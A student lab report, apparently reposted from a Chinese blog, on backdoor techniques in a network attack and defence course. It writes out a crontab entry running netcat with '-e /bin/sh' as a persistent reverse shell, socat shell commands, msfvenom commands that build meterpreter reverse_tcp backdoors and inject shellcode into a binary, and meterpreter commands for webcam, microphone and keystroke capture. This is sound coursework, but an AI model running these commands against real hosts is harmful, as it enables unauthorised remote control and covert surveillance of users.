20232323 2025-2026-1《网络与系统攻防技术》实验二实验报告

news/2025/10/22 20:28:56/文章来源:https://www.cnblogs.com/showmaker77/p/19158902

一、实验内容
1.使用netcat获取主机操作Shell,cron启动某项任务。
2.使用socat获取主机操作Shell, 任务计划启动 。
3.使用MSF meterpreter生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell。
4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权。
5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
6.基础问题回答 
(1)例举你能想到的一个后门进入到你系统中的可能方式?
        通过钓鱼邮件、软件漏洞、受感染的软件更新等。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
        windows:开机自启文件夹放后门快捷方式,用户登陆及自动运行。
        linux:通过crontab后门定时任务运行。
(3)Meterpreter有哪些给你映像深刻的功能?
动态扩展性:支持加载各种插件和脚本,可根据需求扩展功能,增加了防御识别的难度
内存驻留能力:通常不写入磁盘,直接在内存中运行,减少被传统杀毒软件检测到的概率
多种交互功能:能进行文件操作、进程控制、屏幕捕获、键盘记录等,对系统完整性和数据安全构成威胁
(4)如何发现自己有系统有没有被安装后门?
      检查异常启动项,监控可疑进程与网络连接,检查系统计划任务,监控系统日志,杀毒软件扫描
二、实验过程
2.1使用netcat获取主机操作Shell,cron启动某项任务
关闭所有安全保护和防火墙
imageimage

查看自己电脑和虚拟机的IP
imageimage

使用ntcat获取主机操作Shell,cron启动任务
imageimage

kali中设置定时任务
通过crontab -e指令便捷定时任务,选择第二项;文件最后一行添加 **** nc 192.168.1.102 2323 -e /bin/sh
image

完成每分钟开启定时任务
image

2.2使用socat获取主机操作Shell, 任务计划启动
进入计算机管理界面选择任务计划程序设置自启动任务
imageimage

此时,在Kali环境下输入指令socat - tcp:192.168.1.102:2323
image

2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell。
在Kali上执行指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.131 LPORT=2323 -f exe > 20232323_backdoor.exe
image

通过ncat.exe -lv 2323 > 20232323_backdoor.exe指令将被控制主机进入接受文件模式
image

在Linux中执行nc 192.168.230.131 LPORT=2323 < 20232323_backdoor.exe,传送接收文件成功
image

在Kali上使用msfconsole指令进入msf控制台
输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
set LHOST 192.168.239.131,这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 2323,同样要使用相同的端口
设置完成后,执行监听
image

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
使用webcam_snap指令可以使用摄像头进行拍照
image

使用record_mic指令可以截获一段音频
image

使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

image

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
在kali中输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.239.131 LPORT=2323 -x pwn1 -f elf -o 20232323
image

在kali中输入sudo chmod a+x 20232323
image

另起一个shell,输入msfconsole,再次进行监听配置,输入命令如下:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.239.131
set LPORT 2323
Exploit
image

回到原来的shell,运行20232323
输入./20232323
image

三、问题及解决方案
问题1:输入exploit监听时,无法进行监听
解决方案:参考毕悠尘同学的方法,对Metasploit进行更新,更新后可正常进行
image

问题2:无法使用ncat获取主机操作shell
解决方案:文件路径不对,复制文件路径后即解决
image

四、学习感悟
学习后门原理时,会清晰看到其技术本身的 “双刃剑” 属性 —— 同样的内存注入、进程隐藏技术,既可以被攻击者用于非法控制,也能被防御者用于检测恶意程序(如分析病毒行为)。这让我深刻体会到,技术能力的提升必须伴随伦理意识的同步强化。所有针对系统的操作,都必须建立在 “合法授权” 的前提下,一旦跨越 “未经允许” 的边界,技术就会从 “防御工具” 变成 “攻击武器”,最终触犯法律与道德底线。同时使用Metasploit等工具体会到专业渗透技术的高效性,但也暴露了自身在底层命令和原理知识上的不足,未来将注重夯实自身的基础,增强实践能力和理论知识的理解。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943717.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[职业技术学院逃生]

作品状态: \(\color{green}正在更新\) 作品下载 点我 公告 #1点击查看代码 关于"职业技术学院逃生破解版"的态度我方对于职业学院逃生破解版(后称"破解版")表示否认,在1.1.7后本文来自博客园,作…

C#/.NET/.NET Core技术前沿周刊 | 第 58 期(2025年10.13-10.19)

前言 C#/.NET/.NET Core技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NET Core领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与…

完整教程:阿里云上CentOS6.9(停止维护)导致的yum下载chrony失败如何解决?

完整教程:阿里云上CentOS6.9(停止维护)导致的yum下载chrony失败如何解决?pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-fam…

九、OpenCV中视频的录制 - 指南

九、OpenCV中视频的录制 - 指南2025-10-22 20:20 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !importa…

高端网站设计中的微交互:细节如何决定用户体验 - 指南

高端网站设计中的微交互:细节如何决定用户体验 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas&q…

股票操作统计分析报告 - 2025-10-22

股票操作统计分析报告 - 2025-10-22生成时间: 2025-10-22 20:17:44数据来源: 9db.com股票操作统计分析报告数据统计时间: 2025-10-22 数据来源: 9db.com建仓次数最多的股票: 长江电力 (共2次)建仓详细统计 (前10名):1.…

2025年完整指南:DeepSeek OCR 如何通过“视觉压缩”将AI成本降低20倍?

2025年完整指南:DeepSeek OCR 如何通过“视觉压缩”将AI成本降低20倍?DeepSeek OCR 并非传统的光学字符识别工具,而是一种探索“视觉-文本压缩”的前沿AI模型。它通过将长文本转换成图像进行处理,极大地降低了计算…

LGP5494 [LG TPLT] 线段树分裂 学习笔记

LGP5494 [LG TPLT] 线段树分裂 学习笔记 \(\texttt{Luogu Link}\) 前言\(\texttt{Q:}\) 有什么数据结构是支持用合并&分裂查询答案信息的呢? \(\texttt{A:}\) \(\text{FHQ-Treap}\)。 \(\texttt{Q:}\) 还有吗? \…

k8s 常用命令 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

文档智能信息抽取技术在金融财税领域的应用研究与发展前景

在金融与财税这个由海量文档驱动的领域中,效率与准确性是生命线。从繁复的财务报表、五花八门的发票,到冗长的合同与合规文件,传统的人工处理方式不仅成本高昂、效率低下,还极易出错。随着人工智能技术的成熟,文档…

今日策略:年化436%,回撤7%,夏普比5.28, deap因子挖掘重构,附python代码 - 详解

今日策略:年化436%,回撤7%,夏普比5.28, deap因子挖掘重构,附python代码 - 详解pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; fo…

申威架构ky10安装php-7.2.10.rpm详细步骤(国产麒麟系统64位)

申威架构ky10安装php-7.2.10.rpm详细步骤(国产麒麟系统64位)​1. 先确认系统环境​你用的应该是申威平台的银河麒麟系统(版本ky10)​,系统得是64位的(因为这rpm包是_64的)。打开终端(就是黑框框),先敲命令看…

Unity 虚拟仿真实验中设计模式的使用 ——策略模式(Strategy Pattern) - 指南

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

vue2:v-if和v-show的区别以及造成的影响

<div class="form-box-4" v-show="checkedList.includes(0505)"><span class="form-box-4-label"><span style="color: red">*</span>三失一偏类型:…

P6845 题解

P6845 他是一个带修改的直径,直径就是两点间最长距离,很容易想到用差分,\(dis_x\) 表示 \(x\) 到根节点的距离 \(dis_x + dis_y - 2dis_{lca(x,y)}\) 去求,先抛开这个 \(lca\) , 修改一条边相当于修改这个边所对应…

office2024绿色精简版

一、简介 首先需要说明的是,目前的安装方法只适合Windows10、11,并且只支持64位的操作系统,这点需要大家注意。大家下载压缩包解压后,在文件夹中会得到三个运行程序,分别是dll修复程序、和office残余文件彻底清理…

51单片机实践之数码管电子时钟/时间呈现及其设置

51单片机实践之数码管电子时钟/时间呈现及其设置pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", …

LGP3694 邦邦的大合唱站队 学习笔记

LGP3694 邦邦的大合唱站队 学习笔记 \(\texttt{Luogu Link}\) 前言 状压热身题。\(\texttt{Warm up!}\) 另外,你知道吗,设定上,邦邦已经火了…… 题意简述 \(n\) 个偶像排成一列,他们来自 \(m\) 个不同的乐队。每个…

2025.10.22学习记录

2025.10.22课程总结 本次学习聚焦 设计规范、查询技术、高级功能 三大模块,目标是掌握从表结构设计到复杂数据查询的全流程能力,为后续数据分析、系统开发奠定基础。 范式理论 核心观点:范式是电商数据结构化的基础…

LeeCode_101对称二叉树

给你一个二叉树的根节点 root , 检查它是否轴对称。 示例 1:输入:root = [1,2,2,3,4,4,3] 输出:true class Solution { public:bool isSameTree(TreeNode* p, TreeNode* q){if(p == nullptr || q == nullptr){retu…